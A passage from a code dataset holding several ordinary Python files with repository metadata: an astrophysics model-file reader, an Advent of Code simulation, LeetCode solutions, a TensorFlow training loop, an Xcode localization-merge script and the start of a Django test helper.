v_inner) <= 0\n if invalid_volume_mask.sum() > 0:\n message = \"\\n\".join([\"cell {0:d}: v_inner {1:s}, v_outer \"\n \"{2:s}\".format(i, v_inner_i, v_outer_i) for i,\n v_inner_i, v_outer_i in\n zip(np.arange(len(v_outer))[invalid_volume_mask],\n v_inner[invalid_volume_mask],\n v_outer[invalid_volume_mask])])\n raise ConfigurationError(\"Invalid volume of following cell(s):\\n\"\n \"{:s}\".format(message))\n\n return time_of_model, velocity, unscaled_mean_densities, electron_densities, temperature\n\ndef read_abundances_file(abundance_filename, abundance_filetype,\n inner_boundary_index=None, outer_boundary_index=None):\n \"\"\"\n read different density file formats\n\n Parameters\n ----------\n\n abundance_filename: ~str\n filename or path of the density file\n\n abundance_filetype: ~str\n type of the density file\n\n inner_boundary_index: int\n index of the inner shell, default None\n\n outer_boundary_index: int\n index of the outer shell, default None\n\n\n \"\"\"\n\n file_parsers = {'simple_ascii': read_simple_ascii_abundances,\n 'artis': read_simple_ascii_abundances,\n 'cmfgen_model': read_cmfgen_composition,\n 'custom_composition': read_csv_composition}\n\n isotope_abundance = pd.DataFrame()\n if abundance_filetype in [\"cmfgen_model\", \"custom_composition\"]:\n index, abundances, isotope_abundance = file_parsers[abundance_filetype](\n abundance_filename)\n else:\n index, abundances = file_parsers[abundance_filetype](\n abundance_filename)\n\n if outer_boundary_index is not None:\n outer_boundary_index_m1 = outer_boundary_index - 1\n else:\n outer_boundary_index_m1 = None\n index = index[inner_boundary_index:outer_boundary_index]\n abundances = abundances.loc[:, slice(inner_boundary_index, outer_boundary_index_m1)]\n abundances.columns = np.arange(len(abundances.columns))\n return index, abundances, isotope_abundance\n\n\ndef read_uniform_abundances(abundances_section, no_of_shells):\n \"\"\"\n Parameters\n ----------\n\n abundances_section: ~config.model.abundances\n no_of_shells: int\n\n Returns\n -------\n abundance: ~pandas.DataFrame\n isotope_abundance: ~pandas.DataFrame\n \"\"\"\n abundance = pd.DataFrame(columns=np.arange(no_of_shells),\n index=pd.Index(np.arange(1, 120),\n name='atomic_number'),\n dtype=np.float64)\n\n isotope_index = pd.MultiIndex(\n [[]] * 2, [[]] * 2, names=['atomic_number', 'mass_number'])\n isotope_abundance = pd.DataFrame(columns=np.arange(no_of_shells),\n index=isotope_index,\n dtype=np.float64)\n\n for element_symbol_string in abundances_section:\n if element_symbol_string == 'type':\n continue\n try:\n if element_symbol_string in nucname.name_zz:\n z = nucname.name_zz[element_symbol_string]\n abundance.loc[z] = float(\n abundances_section[element_symbol_string])\n else:\n mass_no = nucname.anum(element_symbol_string)\n z = nucname.znum(element_symbol_string)\n isotope_abundance.loc[(z, mass_no), :] = float(\n abundances_section[element_symbol_string])\n\n except RuntimeError as err:\n raise RuntimeError(\n \"Abundances are not defined properly in config file : {}\".format(err.args))\n\n return abundance, isotope_abundance\n\ndef read_simple_ascii_density(fname):\n \"\"\"\n Reading a density file of the following structure (example; lines starting with a hash will be ignored):\n The first density describes the mean density in the center of the model and is not used.\n 5 s\n #index velocity [km/s] density [g/cm^3]\n 0 1.1e4 1.6e8\n 1 1.2e4 1.7e8\n\n Parameters\n ----------\n\n fname: str\n filename or path with filename\n\n\n Returns\n -------\n\n time_of_model: ~astropy.units.Quantity\n time at which the model is valid\n\n data: ~pandas.DataFrame\n data frame containing index, velocity (in km/s) and density\n \"\"\"\n\n with open(fname) as fh:\n time_of_model_string = fh.readline().strip()\n time_of_model = parse_quantity(time_of_model_string)\n\n data = recfromtxt(fname, skip_header=1,\n names=('index', 'velocity', 'density'),\n dtype=(int, float, float))\n velocity = (data['velocity'] * u.km / u.s).to('cm/s')\n mean_density = (data['density'] * u.Unit('g/cm^3'))[1:]\n\n return time_of_model, velocity, mean_density\n\ndef read_artis_density(fname):\n \"\"\"\n Reading a density file of the following structure (example; lines starting with a hash will be ignored):\n The first density describes the mean density in the center of the model and is not used.\n 5\n #index velocity [km/s] log10(density) [log10(g/cm^3)]\n 0 1.1e4 1.6e8\n 1 1.2e4 1.7e8\n\n Parameters\n ----------\n\n fname: str\n filename or path with filename\n\n\n Returns\n -------\n\n time_of_model: ~astropy.units.Quantity\n time at which the model is valid\n\n data: ~pandas.DataFrame\n data frame containing index, velocity (in km/s) and density\n \"\"\"\n\n with open(fname) as fh:\n for i, line in enumerate(open(fname)):\n if i == 0:\n no_of_shells = np.int64(line.strip())\n elif i == 1:\n time_of_model = u.Quantity(float(line.strip()), 'day').to('s')\n elif i == 2:\n break\n\n artis_model_columns = ['index', 'velocities', 'mean_densities_0', 'ni56_fraction', 'co56_fraction', 'fe52_fraction',\n 'cr48_fraction']\n artis_model = recfromtxt(fname, skip_header=2, usecols=(0, 1, 2, 4, 5, 6, 7), unpack=True,\n dtype=[(item, np.float64) for item in artis_model_columns])\n\n\n velocity = u.Quantity(artis_model['velocities'], 'km/s').to('cm/s')\n mean_density = u.Quantity(10 ** artis_model['mean_densities_0'], 'g/cm^3')[1:]\n\n return time_of_model, velocity, mean_density\n\n\ndef read_cmfgen_density(fname):\n \"\"\"\n Reading a density file of the following structure (example; lines starting with a hash will be ignored):\n The first density describes the mean density in the center of the model and is not used.\n The file consists of a header row and next row contains unit of the respective attributes\n Note that the first column has to contain a running index\n\n Example:\n\n index velocity densities electron_densities temperature\n - km/s g/cm^3 /cm^3 K\n 0 871.66905 4.2537191e-09 2.5953807e+14 7.6395577\n 1 877.44269 4.2537191e-09 2.5953807e+14 7.6395577\n\n Rest columns contain abundances of elements and isotopes\n\n Parameters\n ----------\n\n fname: str\n filename or path with filename\n\n\n Returns\n -------\n\n time_of_model: ~astropy.units.Quantity\n time at which the model is valid\n\n velocity: ~np.ndarray\n mean_density: ~np.ndarray\n electron_densities: ~np.ndarray\n temperature: ~np.ndarray\n\n \"\"\"\n warnings.warn(\"The current CMFGEN model parser is deprecated\",\n DeprecationWarning)\n\n df = pd.read_csv(fname, comment='#', delimiter=r'\\s+', skiprows=[0, 2])\n\n with open(fname) as fh:\n for row_index, line in enumerate(fh):\n if row_index == 0:\n time_of_model_string = line.strip().replace('t0:', '')\n time_of_model = parse_quantity(time_of_model_string)\n elif row_index == 2:\n quantities = line.split()\n\n velocity = u.Quantity(df['velocity'].values, quantities[1]).to('cm/s')\n temperature = u.Quantity(df['temperature'].values, quantities[2])[1:]\n mean_density = u.Quantity(df['densities'].values, quantities[3])[1:]\n electron_densities = u.Quantity(\n df['electron_densities'].values, quantities[4])[1:]\n\n return time_of_model, velocity, mean_density, electron_densities, temperature\n\ndef read_simple_ascii_abundances(fname):\n \"\"\"\n Reading an abundance file of the following structure (example; lines starting with hash will be ignored):\n The first line of abundances describe the abundances in the center of the model and are not used.\n #index element1, element2, ..., element30\n 0 0.4 0.3, .. 0.2\n\n Parameters\n ----------\n\n fname: str\n filename or path with filename\n\n Returns\n -------\n\n index: ~np.ndarray\n containing the indices\n\n abundances: ~pandas.DataFrame\n data frame containing index, element1 - element30 and columns according to the shells\n \"\"\"\n data = np.loadtxt(fname)\n\n index = data[1:,0].astype(int)\n abundances = pd.DataFrame(data[1:,1:].transpose(), index=np.arange(1, data.shape[1]))\n\n return index, abundances\n\n\ndef read_cmfgen_composition(fname, delimiter=r'\\s+'):\n \"\"\"Read composition from a CMFGEN model file\n\n The CMFGEN file format contains information about the ejecta state in the\n first four columns and the following ones contain elemental and isotopic\n abundances.\n\n WARNING: deprecated\n\n fname: str\n filename of the csv file\n \"\"\"\n\n warnings.warn(\"The current CMFGEN model parser is deprecated\",\n DeprecationWarning)\n\n return read_csv_isotope_abundances(fname, delimiter=delimiter,\n skip_columns=4, skip_rows=[0, 2, 3])\n\n\ndef read_csv_composition(fname, delimiter=r'\\s+'):\n \"\"\"Read composition from a simple CSV file\n\n The CSV file can contain specific isotopes or elemental abundances in the\n different columns. The first row must contain the header in which the\n contents of each column is specified by the elemental symbol (for elemental\n abundances) or by the symbol plus mass number (for isotopic abundances).\n\n Example: C O Fe Ni56 Co\n\n The i-th row specifies the composition in the i-th shell\n\n fname: str\n filename of the csv file\n \"\"\"\n\n return read_csv_isotope_abundances(fname, delimiter=delimiter,\n skip_columns=0, skip_rows=[1])\n\n\ndef read_csv_isotope_abundances(fname, delimiter=r'\\s+', skip_columns=0,\n skip_rows=[1]):\n \"\"\"\n A generic parser for a TARDIS composition stored as a CSV file\n\n The parser can read in both elemental and isotopic abundances. The first\n column is always expected to contain a running index, labelling the grid\n cells. The parser also allows for additional information to be stored in\n the first skip_columns columns. These will be ignored if skip_columns > 0.\n Note that the first column, containing the cell index is not taken into\n account here.\n\n Specific header lines can be skipped by the skip_rows keyword argument\n\n It is expected that the first row of the date block (after skipping the\n rows specified in skip_rows) specifies the different elements and isotopes.\n Each row after contains the composition in the corresponding grid shell.\n The first composition row describes the composition of the photosphere and\n is essentially ignored (for the default value of skip_rows).\n\n Example:\n\n Index C O Ni56\n 0 1 1 1\n 1 0.4 0.3 0.2\n\n Parameters\n ----------\n\n fname: str\n filename or path with filename\n\n Returns\n -------\n\n index: ~np.ndarray\n abundances: ~pandas.DataFrame\n isotope_abundance: ~pandas.MultiIndex\n \"\"\"\n\n df = pd.read_csv(fname, comment='#',\n sep=delimiter, skiprows=skip_rows, index_col=0)\n df = df.transpose()\n\n abundance = pd.DataFrame(columns=np.arange(df.shape[1]),\n index=pd.Index([],\n name='atomic_number'),\n dtype=np.float64)\n\n isotope_index = pd.MultiIndex(\n [[]] * 2, [[]] * 2, names=['atomic_number', 'mass_number'])\n isotope_abundance = pd.DataFrame(columns=np.arange(df.shape[1]),\n index=isotope_index,\n dtype=np.float64)\n\n for element_symbol_string in df.index[skip_columns:]:\n if element_symbol_string in nucname.name_zz:\n z = nucname.name_zz[element_symbol_string]\n abundance.loc[z, :] = df.loc[element_symbol_string].tolist()\n else:\n z = nucname.znum(element_symbol_string)\n mass_no = nucname.anum(element_symbol_string)\n isotope_abundance.loc[(\n z, mass_no), :] = df.loc[element_symbol_string].tolist()\n\n return abundance.index, abundance, isotope_abundance\n\ndef parse_csv_abundances(csvy_data):\n \"\"\"\n A parser for the csv data part of a csvy model file. This function filters out columns that are not abundances.\n\n Parameters\n ----------\n\n csvy_data : pandas.DataFrame\n\n Returns\n -------\n\n index : ~np.ndarray\n abundances : ~pandas.DataFrame\n isotope_abundance : ~pandas.MultiIndex\n \"\"\"\n\n abundance_col_names = [name for name in csvy_data.columns if nucname.iselement(name) or nucname.isnuclide(name)]\n df = csvy_data.loc[:, abundance_col_names]\n \n df = df.transpose()\n\n abundance = pd.DataFrame(columns=np.arange(df.shape[1]),\n index=pd.Index([],\n name='atomic_number'),\n dtype=np.float64)\n\n isotope_index = pd.MultiIndex(\n [[]] * 2, [[]] * 2, names=['atomic_number', 'mass_number'])\n isotope_abundance = pd.DataFrame(columns=np.arange(df.shape[1]),\n index=isotope_index,\n dtype=np.float64)\n\n for element_symbol_string in df.index[0:]:\n if element_symbol_string in nucname.name_zz:\n z = nucname.name_zz[element_symbol_string]\n abundance.loc[z, :] = df.loc[element_symbol_string].tolist()\n else:\n z = nucname.znum(element_symbol_string)\n mass_no = nucname.anum(element_symbol_string)\n isotope_abundance.loc[(\n z, mass_no), :] = df.loc[element_symbol_string].tolist()\n\n return abundance.index, abundance, isotope_abundance\n","repo_name":"svineet/tardis-examples","sub_path":"tardis/io/model_reader.py","file_name":"model_reader.py","file_ext":"py","file_size_in_byte":16060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"74642983668","text":"#!/usr/bin/python3\n\nimport argparse\nimport re\n\n# Parse command-line arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--verbose\", help=\"More output\", action=\"store_true\")\nparser.add_argument(\"--steps\", help=\"Target number of steps\", type=int)\nparser.add_argument(\"filename\", help=\"Star Map\")\nargs = parser.parse_args()\n\nclass Moon:\n def __init__(self, x, y, z):\n self.p = [x,y,z]\n self.v = [0,0,0]\n\n def step(self):\n for axis in range(3):\n self.p[axis] += self.v[axis]\n\n def energy(self):\n potential = 0\n kinetic = 0\n for axis in range(3):\n potential += abs(self.p[axis])\n kinetic += abs(self.v[axis])\n return potential * kinetic\n\ndef invcmp(a, b):\n return (a < b) - (a > b)\n\n# Turn our input file into a set of (x,y) tuples\ninputfile = open(args.filename)\nmoons = set()\nfor line in inputfile:\n m = re.match('', line)\n if m is None:\n print(\"Failed to match line:\", line)\n exit(1)\n moon = Moon( int(m.group(1)), int(m.group(2)), int(m.group(3)) )\n moons.add(moon)\n\nfor steps in range(1, args.steps+1):\n # Calculate the acceleration due to gravity for each of our moons\n for moon in moons:\n for other in moons:\n if args.verbose:\n print(\"\\tConsidering effect on our moon at\", moon.p, \"of other moon at\", other.p)\n for axis in range(3):\n moon.v[axis] += invcmp(moon.p[axis], other.p[axis])\n\n for moon in moons:\n moon.step()\n\nprint(\"After\", steps, \"steps:\")\ntotalenergy = 0\nfor moon in moons:\n energy = moon.energy()\n print(\"Moon at\", moon.p, \"has energy\", energy)\n totalenergy += energy\n\nprint(\"Total energy:\", totalenergy)\n","repo_name":"davepage-mcr/aoc2019","sub_path":"day12/moon.py","file_name":"moon.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"785240348","text":"\"\"\"\n419. Battleships in a Board\nMedium\n\nGiven an m x n matrix board where each cell is a battleship 'X' or empty '.', return the number of the battleships on board.\n\nBattleships can only be placed horizontally or vertically on board. In other words, they can only be made of the shape 1 x k (1 row, k columns) or k x 1 (k rows, 1 column), where k can be of any size. At least one horizontal or vertical cell separates between two battleships (i.e., there are no adjacent battleships).\n\nExample 1:\n\nInput: board = [[\"X\",\".\",\".\",\"X\"],[\".\",\".\",\".\",\"X\"],[\".\",\".\",\".\",\"X\"]]\nOutput: 2\nExample 2:\n\nInput: board = [[\".\"]]\nOutput: 0\n\nConstraints:\n\nm == board.length\nn == board[i].length\n1 <= m, n <= 200\nboard[i][j] is either '.' or 'X'.\n\n\nFollow up: Could you do it in one-pass, using only O(1) extra memory and without modifying the values board?\n\"\"\"\n#5%\nclass Solution:\n def countBattleships(self, board: List[List[str]]) -> int:\n self.seen = []\n answer = 0\n\n def lookDown(pos):\n if pos[0] + 1 < len(board):\n self.seen.append([pos[0] + 1, pos[1]])\n if board[pos[0] + 1][pos[1]] == \"X\":\n lookDown([pos[0] + 1, pos[1]])\n\n def lookRight(pos):\n if pos[1] + 1 < len(board[0]):\n self.seen.append([pos[0], pos[1] + 1])\n if board[pos[0]][pos[1] + 1] == \"X\":\n lookRight([pos[0], pos[1] + 1])\n\n for i in range(len(board)):\n for j in range(len(board[0])):\n if [i, j] not in self.seen:\n self.seen.append([i, j])\n if board[i][j] == \"X\":\n answer += 1\n lookDown([i, j])\n lookRight([i, j])\n\n return answer\n\n\"\"\"\nsample 57 ms submission\nclass Solution:\n def countBattleships(self, board: List[List[str]]) -> int:\n def isHead(i, j):\n #return True/False\n if board[i][j] == 'X' and \\\n (i == 0 or board[i - 1][j] != 'X') and \\\n (j == 0 or board[i][j-1] != 'X'):\n return True\n \n return False\n \n R = len(board)\n C = len(board[0])\n bCount = 0\n for i in range(R):\n for j in range(C):\n if isHead(i, j):\n bCount += 1\n \n return bCount\n\"\"\"","repo_name":"jzman353/Leetcode","sub_path":"Array/2D/Battleships in a Board.py","file_name":"Battleships in a Board.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"43070431856","text":"# You are given a string s, which contains stars *.\n#\n# In one operation, you can:\n#\n# Choose a star in s.\n# Remove the closest non-star character to its left, as well as remove the star itself.\n# Return the string after all stars have been removed.\n#\n# Note:\n#\n# The input will be generated such that the operation is always possible.\n# It can be shown that the resulting string will always be unique.\n#\n# Example 1:\n# Input: s = \"leet**cod*e\"\n# Output: \"lecoe\"\n# Explanation: Performing the removals from left to right:\n# - The closest character to the 1st star is 't' in \"leet**cod*e\". s becomes \"lee*cod*e\".\n# - The closest character to the 2nd star is 'e' in \"lee*cod*e\". s becomes \"lecod*e\".\n# - The closest character to the 3rd star is 'd' in \"lecod*e\". s becomes \"lecoe\".\n# There are no more stars, so we return \"lecoe\".\n#\n# Example 2:\n# Input: s = \"erase*****\"\n# Output: \"\"\n# Explanation: The entire string is removed, so we return an empty string.\n#\n#\n# Constraints:\n# 1 <= s.length <= 105\n# s consists of lowercase English letters and stars *.\n# The operation above can be performed on s.\n\nfrom decorator import function_execution_time\n\nclass SolutionOne:\n @function_execution_time\n def removeStars(self, s: str) -> str:\n list_s = list(s)\n while \"*\" in list_s:\n for el in range(len(list_s)):\n if list_s[el] == \"*\":\n del list_s[el - 1:el + 1]\n break\n\n return ''.join(list_s)\n\n\nclass SolutionTwo:\n\n def delStar(self, _list: list) -> list:\n if '*' in _list:\n index = _list.index('*')\n del _list[index - 1:index + 1]\n self.delStar(_list)\n\n return _list\n\n @function_execution_time\n def removeStars(self, s: str) -> str:\n _list = list(s)\n\n self.delStar(_list)\n\n return ''.join(_list)\n\n\n\nif __name__ == '__main__':\n\n result = SolutionOne()\n print(result.removeStars(s=\"leet**cod*e\"*100))\n\n\n result = SolutionTwo()\n print(result.removeStars(s=\"leet**cod*e\"*100))\n","repo_name":"aidarhaertdinov/tasks_solution","sub_path":"task_27/removing_stars_from_a_string.py","file_name":"removing_stars_from_a_string.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71601709749","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 7 20:51:21 2019\n@author: Enyang\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nimport tFunctions as tFunc\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef model(X_train, Y_train, X_test, Y_test, X_vali, Y_vali, units_per_layer, learning_rate = 0.0001,\n num_epochs = 1500, minibatch_size = 32, print_cost = True):\n \"\"\"\n Implements a three-layer tensorflow neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SOFTMAX.\n \n Tensorflow will find the dependent operations and run them first if need.\t\n Your cost function uses Z3 as a parameter and you calculated Z3 with the forward_propagation function,\n so Tensorflow will run all these functions for you in the correct order.\n \n Arguments:\n X_train -- training set, of shape (input size = 12288, number of training examples = 1080)\n Y_train -- test set, of shape (output size = 6, number of training examples = 1080)\n X_test -- training set, of shape (input size = 12288, number of training examples = 120)\n Y_test -- test set, of shape (output size = 6, number of test examples = 120)\n learning_rate -- learning rate of the optimization\n num_epochs -- number of epochs of the optimization loop\n minibatch_size -- size of a minibatch\n print_cost -- True to print the cost every 100 epochs\n \n Returns:\n parameters -- parameters learnt by the model. They can then be used to predict.\n \"\"\"\n \n ops.reset_default_graph() # to be able to rerun the model without overwriting tf variables\n tf.set_random_seed(1) # to keep consistent results\n seed = 3 # to keep consistent results\n (n_x, m) = X_train.shape # (n_x: input size, m : number of examples in the train set)\n n_y = Y_train.shape[0] # n_y : output size\n costs = [] # To keep track of the cost\n \n # Create Placeholders of shape (n_x, n_y)\n X, Y = tFunc.create_placeholders(n_x, n_y)\n\n # Initialize parameters\n parameters = tFunc.initialize_parameters(units_per_layer)\n \n # Forward propagation: Build the forward propagation in the tensorflow graph\n z3 = tFunc.forward_propagation(X, parameters, units_per_layer)\n \n # Cost function: Add cost function to tensorflow graph\n cost = tFunc.compute_cost(z3, Y)\n \n # Backpropagation: Define the tensorflow optimizer. Use an AdamOptimizer.\n optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(cost)\n \n # Initialize all the variables\n init = tf.global_variables_initializer()\n\n # Start the session to compute the tensorflow graph\n with tf.Session() as sess:\n \n # Run the initialization\n sess.run(init)\n \n # Do the training loop\n for epoch in range(num_epochs):\n\n minibatch_cost = 0.\n num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set\n seed = seed + 1\n minibatches = tFunc.random_mini_batches(X_train, Y_train, minibatch_size, seed)\n\n for minibatch in minibatches:\n\n # Select a minibatch\n (minibatch_X, minibatch_Y) = minibatch\n \n # IMPORTANT: The line that runs the graph on a minibatch.\n # Run the session to execute the optimizer and the cost, the feedict should contain a minibatch for (X,Y).\n _ , temp_cost = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})\n \n minibatch_cost += temp_cost / num_minibatches\n\n # Print the cost every epoch\n if print_cost == True and epoch % 100 == 0:\n print (\"Cost after epoch %i: %f\" % (epoch, minibatch_cost))\n if print_cost == True and epoch % 5 == 0:\n costs.append(minibatch_cost)\n \n # plot the cost\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\n # lets save the parameters in a variable\n parameters = sess.run(parameters)\n print (\"Parameters have been trained!\")\n\n # Calculate the correct predictions\n # tf.argmax(z3) returns an array with the indexes of the biggest value within z3 tensor\n # Y is one-hot encoded, so it has one 1 and all other are zero. \n # pred represents probabilities of classes. \n # So argmax finds the positions of best prediction and correct value. \n # After that you check whether they are the same.\n # tf.equal returns a 1D array with 0's and 1's\n correct_prediction = tf.equal(tf.argmax(z3), tf.argmax(Y))\n\n # Calculate accuracy on the test set\n # By computing the mean of elements across dimensions of a tensor.\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\n print (\"Train Accuracy:\", accuracy.eval({X: X_train, Y: Y_train}))\n print (\"Validation Accuracy:\", accuracy.eval({X: X_vali, Y: Y_vali}))\n print (\"Test Accuracy:\", accuracy.eval({X: X_test, Y: Y_test}))\n \n return parameters\n\n","repo_name":"enyangxxx/tfFoodImageClassifier","sub_path":"tModel.py","file_name":"tModel.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"27062080406","text":"class Solution(object):\n def getHint(self, secret, guess):\n \"\"\"\n :type secret: str\n :type guess: str\n :rtype: str\n \"\"\"\n bull_num = 0\n cow_num = 0\n nums = [0] * 10\n for i in range(len(secret)):\n num = int(secret[i])\n nums[num] += 1\n for i in range(len(guess)):\n num = int(guess[i])\n if nums[num] > 0:\n cow_num += 1\n nums[num] -= 1\n if guess[i] == secret[i]:\n bull_num += 1\n cow_num -= 1\n return str(bull_num) + \"A\" + str(cow_num) + \"B\"\n","repo_name":"lstytld/LeetCode","sub_path":"201 - 300/299. Bulls and Cows.py","file_name":"299. Bulls and Cows.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"72649181109","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\"\"\"Update by merging .strings file(s) of an Xcode project.\"\"\"\n\nimport os\nimport sys\nimport shlex\nimport shutil\nimport tempfile\nimport re\nfrom string import Template\nfrom subprocess import Popen, PIPE\n\n__author__ = \"Ali Servet Donmez\"\n__email__ = \"asd@pittle.org\"\n__version__ = \"0.9.1\"\n\n# ==============================================================================\n# SETTINGS\n# ==============================================================================\n\nGENSTRING_SEARCH_PATHS = [\n]\n\"\"\"Recursive search paths where Objective-C source file(s) will be searched.\"\"\"\n\nBASE_LANG = 'en'\n\"\"\"Base localization language which will be overridden at all times.\"\"\"\n\nOTHER_LANGS = [\n]\n\"\"\"List of additional localization languages which will be updated.\"\"\"\n\nBASE_RESOURCES = ''\n\"\"\"Base resources directory which will be overridden at all times.\"\"\"\n\nOTHER_RESOURCES = [\n]\n\"\"\"List of additional resources that will be updated.\"\"\"\n\n# ==============================================================================\n# DO NOT TOUCH BELOW HERE\n# ==============================================================================\n\nclass LocalizedString():\n\n def __init__(self, key, value, comment=None):\n self.key = key\n self.value = value\n self.comment = comment\n self.todoc = False\n\n def __str__(self):\n return Template('/* $todoc$comment */\\n\"$key\" = \"$value\";').substitute(\n key=self.key,\n value=self.value,\n comment=self.comment or \"No comment provided by engineer.\",\n todoc='TODOC ' if self.todoc else '',\n )\n\n def __lt__(self, other):\n return self.key.lower() < other.key.lower()\n\ndef check_and_setup_settings():\n global OTHER_LANGS\n # Remove duplicate entries\n OTHER_LANGS = list(set(OTHER_LANGS))\n if BASE_LANG in OTHER_LANGS:\n sys.stderr.write(\"OTHER_LANGS must not include base language: %s.\\n\" % BASE_LANG)\n return False\n return True\n\ndef check_xcode_setup():\n for res in [BASE_RESOURCES] + OTHER_RESOURCES:\n for lang in [BASE_LANG] + OTHER_LANGS:\n lang_dirname = os.path.join(res, '%s.lproj' % lang)\n if not os.path.isdir(lang_dirname):\n sys.stderr.write('Missing directory: %s.\\n' % lang_dirname)\n return False\n return True\n\ndef genstrings(output_path):\n \"\"\"Recursively search current working directory for Objective-C source code\n file(s) and return output generated by internal genstrings utility for lines\n containing text of the form NSLocalizedString(\"key\", comment) or\n CFCopyLocalizedString(\"key\", comment).\n\n \"\"\"\n find_cmd = r\"find -E %s -iregex '.*\\.(h|m|mm)' -print0\" % ' '.join(GENSTRING_SEARCH_PATHS)\n genstrings_cmd = 'xargs -0 genstrings -o \"%s\"' % output_path\n\n try:\n p1 = Popen(shlex.split(find_cmd), stdout=PIPE)\n p2 = Popen(shlex.split(genstrings_cmd), stdin=p1.stdout, stdout=PIPE)\n p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits.\n p2.communicate()\n except OSError:\n sys.stderr.write(\"Error (e.g., trying to execute a non-existent file).\\n\")\n sys.exit()\n except ValueError:\n sys.stderr.write(\"Invalid arguments.\\n\")\n sys.exit()\n\n with open(os.path.join(output_path, 'Localizable.strings'), 'r') as f:\n return f.read().decode('utf16').strip()\n\ndef parse_strings_file(data):\n \"\"\"Parse .strings file and return a list of LocalizedString objects.\n\n Keyword arguments:\n data -- .strings file content\n\n \"\"\"\n return [LocalizedString(*parse_localized_string(s)) for s in data.split('\\n\\n')]\n\nre_comment = re.compile(r'^/\\* (.*) \\*/$')\nre_l10n = re.compile(r'^\"(.+)\" = \"(.+)\";$')\n\ndef parse_localized_string(text):\n \"\"\"Parse text and return key, value and comment tuple.\n\n Keyword arguments:\n text -- localized strings text, leading and trailing characters will be removed if necessary.\n\n \"\"\"\n split = text.strip().split('\\n')\n\n if len(split) == 2:\n return re_l10n.match(split[1]).groups() + (re_comment.match(split[0]).groups()[0],)\n\ndef save_strings(strings, base_path):\n \"\"\"Write Localizable.strings to disk.\n\n Keyword arguments:\n strings -- list of LocalizedString objects.\n base_path -- where Localizable.strings file will be written.\n\n \"\"\"\n write_data = unicode()\n for s in strings:\n write_data += \"%s\\n\\n\" % unicode(s)\n with open(os.path.join(base_path, 'Localizable.strings'), 'wb') as f:\n f.write(write_data.encode('utf16'))\n\ndef merge_strings(base_strings, other_strings):\n \"\"\"Merge two list of localized strings.\n\n Keyword arguments:\n base_strings -- more up-to-date list of localized strings.\n other_strings -- previous list of localized strings.\n\n \"\"\"\n # Local copy of base_strings since we don't want to change it outside too\n merged = base_strings[:]\n for s in merged:\n s.todoc = True\n for i, base in enumerate(merged):\n for other in other_strings:\n if base.key == other.key:\n merged[i] = other\n return merged\n\ndef main():\n filename = os.path.split(__file__)[1]\n\n # Check if script is configured okay\n if not check_and_setup_settings():\n sys.stderr.write(\"%s: configuration error.\\n\" % filename)\n return os.EX_CONFIG\n\n # Check if Xcode project is setup ready for localizations to take place\n if not check_xcode_setup():\n sys.stderr.write(\"%s: project is not setup correctly.\\n\" % filename)\n return os.EX_CONFIG\n\n # All checks went well, here comes the good part...\n\n # Generate latest string table from source code\n dtemp_path = tempfile.mkdtemp()\n latest_strings = parse_strings_file(genstrings(dtemp_path))\n shutil.rmtree(dtemp_path)\n\n # Save base .strings file as it is by overwriting the old one\n save_strings(latest_strings, os.path.join(BASE_RESOURCES, '%s.lproj' % BASE_LANG))\n\n # For any other languages do the merge-magic and write to disk\n for lang in OTHER_LANGS:\n merged = None\n try:\n read_data = None\n with open(os.path.join(BASE_RESOURCES, '%s.lproj' % lang, 'Localizable.strings'), 'r') as f:\n read_data = f.read().decode('utf16')\n merged = merge_strings(latest_strings, parse_strings_file(read_data.strip()))\n except IOError:\n merged = latest_strings\n\n save_strings(sorted(merged), os.path.join(BASE_RESOURCES, '%s.lproj' % lang))\n\n # For all other languages for all other resources do the merge-magic and write to disk\n # FIXME This code block is almost identical to one above, wrap these two\n for res in OTHER_RESOURCES:\n for lang in [BASE_LANG] + OTHER_LANGS:\n read_data = None\n with open(os.path.join(res, '%s.lproj' % lang, 'Localizable.strings'), 'r') as f:\n read_data = f.read().decode('utf16')\n merged = merge_strings(latest_strings, parse_strings_file(read_data.strip()))\n save_strings(sorted(merged), os.path.join(res, '%s.lproj' % lang))\n\n return os.EX_OK\n\nif __name__ == '__main__':\n status = main()\n sys.exit(status)\n\n# End of file\n","repo_name":"gistable/gistable","sub_path":"all-gists/4130087/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":7228,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"94"} +{"seq_id":"13194361071","text":"import copy\n\nfrom django.contrib.auth import get_user_model\nfrom rest_framework.test import APIClient\n\nfrom . import objects_creator\nfrom .assertions import Assertions\nfrom .data import Data\n\n\ndef authentication(client, client_auth_data):\n token = client.post('/api/auth/token/login/', client_auth_data).data['auth_token']\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n\nclass SetDataClass(Assertions):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n cls.tags = objects_creator.create_objects(\n creator=objects_creator.tag_creator,\n objects=Data.tags\n )\n cls.ingredients = 